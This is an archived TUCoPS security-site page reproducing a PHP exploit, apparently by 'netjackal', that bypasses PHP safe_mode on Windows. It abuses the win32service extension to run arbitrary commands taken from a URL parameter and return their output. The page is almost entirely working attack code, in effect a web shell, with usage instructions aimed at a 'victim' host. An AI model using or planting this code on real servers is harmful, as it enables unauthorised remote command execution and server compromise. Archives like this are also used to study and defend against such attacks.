TUCoPS :: Web :: PHP :: tb11808.htm

PHP Safe_mode bypass exploit (win32service)
PHP Safe_mode bypass exploit (win32service)
PHP Safe_mode bypass exploit (win32service)


http://netjackal.by.ru ### 
###                                               ###
###                                               ###
### Usage: http://victim.net/nj.php?CMD=[command] ### 
#####################################################

$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand
$dir=ini_get('upload_tmp_dir'); #Directory to store command's output

if(!extension_loaded('win32service'))die('win32service extension not found!');
$name=$dir."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec=file_get_contents($name);
unlink($name);
echo "
".htmlspecialchars($exec)."
";
?>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH